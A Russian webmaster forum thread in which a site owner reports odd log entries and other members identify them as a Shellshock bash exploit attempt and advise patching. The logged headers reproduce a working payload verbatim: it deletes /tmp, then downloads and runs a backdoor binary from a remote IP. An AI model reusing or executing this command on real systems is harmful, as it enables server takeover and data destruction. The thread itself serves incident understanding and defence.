Странные HTTP_REFERER и HTTP_USER_AGENT возможно вирусы

SS
На сайте с 12.03.2015
Offline
5
1044

Сегодня в логах обнаружил обращение к серверу со странными HTTP_REFERER и HTTP_USER_AGENT, а именно:

HTTP_REFERER => () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://23.234.29.209:8806/cctv2 -O /tmp/China.Z-hewi >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hewi >> /tmp/Run.sh;echo /tmp/China.Z-hewi >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

HTTP_USER_AGENT => () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://23.234.29.209:8806/cctv2 -O /tmp/China.Z-hewi >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-hewi >> /tmp/Run.sh;echo /tmp/China.Z-hewi >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"

Решил полюбопытствовать. Скачал через download master файл размером 800 Кб с адреса http://23.234.29.209:8806/cctv2 , затем решил его проверить касперским, нажал правой кнопкой и в меню выбрал "Проверить на вирусы" в итоге файл исчез, а касперский так и не запустился. Скачав себе на пк данный файл я совершил ошибку? Кто-нибудь сталкивался с чем либо подобным?

O
На сайте с 29.05.2008
Offline
195
#1

s-serg, при вызове контекстного меню, вы обратились к файлу. Антивирус проверяет каждое обращение в реальном времени. Соответственно, скорее всего, файл был добавлен в карантин.

Смотрите отчеты и объекты на карантине в своем антивирусе.

SS
На сайте с 12.03.2015
Offline
5
#2

Файл оказался в карантине, обнаружено Backdoor.Linux.Mayday.g

O
На сайте с 29.05.2008
Offline
195
#3

s-serg, для Windows он не опасен. Можете исключить из карантина и продолжить исследование дальше.

A
На сайте с 19.07.2010
Offline
130
#4

Пытаются найти уязвимость в bash-е, пол-года - год назад была в нем дыра, возможно не все еще пропатчились.

Линк: /ru/forum/867276

.............
O
На сайте с 29.05.2008
Offline
195
#5

admak, причем заголовок файла, /tmp/China.Z-hew, как бы намекает чьих рук дело. :)

auditsaitov001
На сайте с 28.06.2015
Offline
11
#6

Советую тс-у проверить - не подвержен ли баш на его сервере уязвимости шелл-шок.

Если все пропатчено - нечего волноваться.

Такое почти ежедневно в логах вижу....

Аудит безопасности Вашего сайта квалифицированным специалистом по иб. Ручная проверка кода на уязвимости, поиск вирусов, вебшеллов и проч. Полная проверка, а не простое удаление вирусов.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий